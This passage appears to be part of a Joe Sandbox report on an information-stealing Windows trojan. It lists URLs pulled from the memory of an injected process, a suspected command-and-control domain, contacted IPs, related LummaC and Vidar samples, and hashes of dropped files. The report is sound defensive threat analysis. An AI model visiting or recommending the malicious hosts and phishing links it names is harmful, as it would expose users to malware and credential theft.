https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE | BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.valvesoftware.com/legal.htm | BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.youtube.com | BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com | BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://villagedguy.cyou/apibu | BitLockerToGo.exe, 00000002.00000002.2038989446.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2032771167.0000000002D1D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://villagedguy.cyou:443/api | BitLockerToGo.exe, 00000002.00000003.1998002889.0000000002D2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1996190492.0000000002D2C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://villagedguy.cyou/ | BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.gnu.org/gethelp/ | libidn2-0.dll.0.dr | false | | unknown
https://s.ytimg.com; | BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=I6RUPT-G-voT&amp | BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://steam.tv/ | BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp; | BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://store.steampowered.com/privacy_agreement/ | BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67& | BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                                                                      https://store.steampowered.com/points/shop/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://www.gnu.org/software/libidn/#libidn2libidn2-0.dll.0.drfalse
                                                                                        unknown
                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016BitLockerToGo.exe, 00000002.00000003.1924301094.000000000508E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPKBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&ampBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&amp;BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://sketchfab.comBitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://lv.queniujq.cnBitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://www.color.org)Qt5GuiVBox.dllfalse
                                                                                                    unknown
                                                                                                    https://steamcommunity.com/profiles/76561199724331900/inventory/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://www.youtube.com/BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://villagedguy.cyou/api~VlBitLockerToGo.exe, 00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://support.microsofBitLockerToGo.exe, 00000002.00000003.1924301094.0000000005090000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://www.google.com/recaptcha/BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://checkout.steampowered.com/BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://gnu.org/licenses/gpl.htmllibidn2-0.dll.0.drfalse
                                                                                                                  unknown
                                                                                                                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://www.gnu.org/software/libidn/#libidn2Libidn2Generallibidn2-0.dll.0.drfalse
                                                                                                                      unknown
                                                                                                                      https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://store.steampowered.com/;BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&amp;l=engliBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://store.steampowered.com/about/BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://community.cloudflare.steamstatic.com/BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://villagedguy.cyou/api0BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://help.steampowered.com/en/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://steamcommunity.com/market/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://store.steampowered.com/news/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://www.gnu.org/gethelp/exebatcmdcomlibidn2-0.dll.0.drfalse
                                                                                                                                    unknown
                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17BitLockerToGo.exe, 00000002.00000003.1924301094.000000000508E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuXBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://recaptcha.net/recaptcha/;BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://steamcommunity.com/discussions/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://store.steampowered.com/stats/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&amp;l=englisBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://medal.tvBitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.zitadel.ch/assets/v1/avatar-32432jkh4kj32Imperial_Delay.exefalse
                                                                                                                                                unknown
                                                                                                                                                https://broadcast.st.dl.eccdnx.comBitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://villagedguy.cyou/apiOBitLockerToGo.exe, 00000002.00000003.2009812823.0000000002D19000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2010533759.0000000002D1C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2010643755.0000000002D1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=xYs7BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
Reputation: unknown
https://store.steampowered.com/steam_refunds/ | Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif | Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v | Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
http://x1.c.lencr.org/0 | Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
http://x1.i.lencr.org/0 | Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
https://villagedguy.cyou/apiob | Source: BitLockerToGo.exe, 00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p | Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900 | Source: BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
https://www.virtualbox.org/ | Source: VBoxProxyStub-x86.dll.0.dr | Malicious: false | Reputation: unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
104.21.32.196 | villagedguy.cyou | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545779
Start date and time: 2024-10-31 01:04:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: HLZwUhcJ28.exe (renamed because the original name is a hash value)
Original Sample Name: 4b93cf26d6e6c52e332e084f0940c5e687a91b08e66ee822aae302d1b1f3c014.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/13@10/2
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 87
• Number of non-executed functions: 119
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Imperial_Delay.exe, PID 1136, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: HLZwUhcJ28.exe
Time | Type | Description
20:05:20 | API Interceptor | 11x Sleep call for process: BitLockerToGo.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.102.49.254 | http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | www.valvesoftware.com/legal.htm
104.21.32.196 | z5DptXNeB1.exe | malicious | Lokibot | ideshowsx.xyz/ide/five/fre.php
Match: steamcommunity.com
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC | 104.102.49.254
file.exe | malicious | LummaC | 104.102.49.254
file.exe | malicious | LummaC | 104.102.49.254
burlar al diablo napoleon hill pdf.exe | malicious | Unknown | 104.102.49.254
burlar al diablo napoleon hill pdf.exe | malicious | Unknown | 104.102.49.254
buNtKcYHCa.exe | malicious | LummaC | 104.102.49.254
yt5xqAvHnZ.exe | malicious | Vidar | 104.102.49.254
SecuriteInfo.com.Trojan.TR.Redcap.cdtxw.10783.3124.exe | malicious | LummaC | 104.102.49.254
9yJSTTEg68.exe | malicious | Vidar | 104.102.49.254
file.exe | malicious | LummaC | 104.102.49.254
Match: AKAMAI-ASUS
Associated Sample Name / URL | Detection | Threat Name | Context
https://webdemo.biz/ | malicious | NetSupport RAT, CAPTCHA Scam | 184.28.90.27
V6QED2Q1WBYVOPE | malicious | Unknown | 23.46.224.247
https://irs-ci.secureemailportal.com/s/e?m=ABDvX2xiE1DvdsTP333wt4Qp&c=ABDsD05ZNJ23bCjfjm6gXjJS&em=publicrecords%40marionfl.org | malicious | Unknown | 2.19.126.211
file.exe | malicious | LummaC | 104.102.49.254
file.exe | malicious | Stealc, Vidar | 23.47.50.173
file.exe | malicious | LummaC | 104.102.49.254
https://apollomicsinc-my.sharepoint.com/:u:/p/peony_yu/EThcAjzaTWNPs4NpIP1X0v0BUe4pmKNB9s6TANBDk5EDeA?rtime=8VndtY_33Eg | malicious | Unknown | 23.38.98.68
https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utm | malicious | HTMLPhisher | 184.28.89.220
https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/file | malicious | Unknown | 104.102.34.86
file.exe | malicious | LummaC | 104.102.49.254

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
https://webdemo.biz/ | malicious | NetSupport RAT, CAPTCHA Scam | 104.26.0.231
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
file.exe | malicious | Stealc, Vidar | 172.64.41.3
file.exe | malicious | LummaC | 188.114.97.3
http://hprus.conegutsud.com.pe/4zgrHK17910PyfC1508dysnmxbczx27005OLWUIBMTRFCEVBH25578NWDJ17331m12#2mzdvgfkgua042eh8kky7aanhr5dggelvb8fjk5yz6jna8o8e5 | malicious | Phisher | 188.114.96.3
file.exe | malicious | Unknown | 104.26.0.100
file.exe | malicious | Unknown | 104.26.0.100
SecuriteInfo.com.Trojan.PWS.Lumma.749.31391.1681.exe | malicious | LummaC, DarkTortilla, LummaC Stealer | 104.21.33.140
5lg7zd.elf | malicious | Unknown | 188.114.97.3
file.exe | malicious | LummaC | 104.21.41.39
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.102.49.254, 104.21.32.196
file.exe | malicious | LummaC | 104.102.49.254, 104.21.32.196
SecuriteInfo.com.Trojan.PWS.Lumma.749.31391.1681.exe | malicious | LummaC, DarkTortilla, LummaC Stealer | 104.102.49.254, 104.21.32.196
file.exe | malicious | LummaC | 104.102.49.254, 104.21.32.196
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.102.49.254, 104.21.32.196
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.102.49.254, 104.21.32.196
SecuriteInfo.com.Trojan.PWS.Lumma.749.8914.14992.exe | malicious | LummaC | 104.102.49.254, 104.21.32.196
file.exe | malicious | LummaC
                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                  • 104.21.32.196
                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                  • 104.21.32.196
                                                                                                                                                                  819614 - Midways Freight Ltd.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                  • 104.21.32.196
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5SqlVBox.dllverification.b-cdn.net.ps1Get hashmaliciousGo Injector, StealcBrowse
Process: C:\Users\user\Desktop\HLZwUhcJ28.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 17504256
Entropy (8bit): 6.423254601605558
Encrypted: false
SSDEEP: 98304:3KZ4GZa+FkF9cwOUtC2XRl/4reA4fSM4/mQrgPrcVZ821ZX6wKxys20MbKaY4NHO:6WdB6reA4fz2mQrgj+Jz5Ks5bX0f
MD5: C1A90FA945AD6CED2104263762C7FCB4
SHA1: 9FB88668EB77F217A8C513AB8DAD78969CF68A5F
SHA-256: 61784B8AA2940DC231E8CBD955C5F313556B14EACB6B19699DA46A76FC496074
SHA-512: 47BB3640706FB5C990B0988D53E4DA70416426B85D058E2AEA1CDAD7ADF3F8FC9582C506135A996B700B25E15AE900A139F74A6EB0E2CEC35545CA843D761AD4
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 83%
Reputation: low
Process: C:\Users\user\Desktop\HLZwUhcJ28.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 6860032
Entropy (8bit): 6.706300556505754
Encrypted: false
SSDEEP: 49152:onEioloxnujFw81clK7uqtfMxzWHIbi/CCwjxpE4RFzwToN2BM7PV1HbSTiBAym2:OEiEZEqeHX/RFKociJYtl8vsOM04bm
MD5: FDB292453760D9BC3CDD0B54013C6A99
SHA1: 30D27DA6EC867ED2B8A53384AC947B812D9D7CBD
SHA-256: 86F6A04FE611CA402D3C4841561F5B396CE61F0212BB6DA58C7274532E2CFD14
